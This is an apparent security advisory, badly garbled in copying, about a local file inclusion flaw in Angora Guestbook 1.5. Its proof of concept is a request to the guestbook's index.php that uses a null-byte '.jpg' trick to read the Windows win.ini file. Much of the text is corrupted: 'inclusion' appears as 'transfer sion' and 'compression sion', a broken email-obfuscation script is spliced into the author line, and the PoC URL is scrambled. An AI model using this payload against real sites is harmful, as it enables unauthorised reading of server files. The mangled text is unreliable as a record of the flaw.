------------------------------------------------------------------------
Software ...... Angora Guestbook 1.5
Vulnerability ...... Local File transfer sion
Threat Level ...... Critical (4/5)
Download ...... http://aguestbook.sourceforge.net/
Discovery Date ......
Tested On...
------------------------------------------------------------------------
Author ...... AutoSec Tools
Site ...... http://www.autosectools.com/
Email ...... .................... John Leitch <john@autosectools.com <SCRIPT type = text/javascript>
/* <! [CDATA [*/
(Function () {try {var s, a, I, j, r, c, l = document. getElementById ("_ cf_email _"); a = l. className; if (a) {s =; r = parseInt (. substr (0, 2), 16); for (j = 2;. length-j; j + = 2) {c = parseInt (. substr (j, 2), 16) ^ r; s + = String. fromCharCode (c);} s = document. createTextNode (s); l. parentNode. replaceChild (s, l) ;}} catch (e ){}})();
/*]> */
</SCRIPT>
------------------------------------------------------------------------
-- Description --
A local file compression sion vulnerability in Angora Guestbook 1.5 can be
Exploited to include arbitrary files.
-- PoC --
Windows%2fwin.ini%00.jpg "> http://www.bkjia.com/angora_1_5/guestbook/index.php? Bytes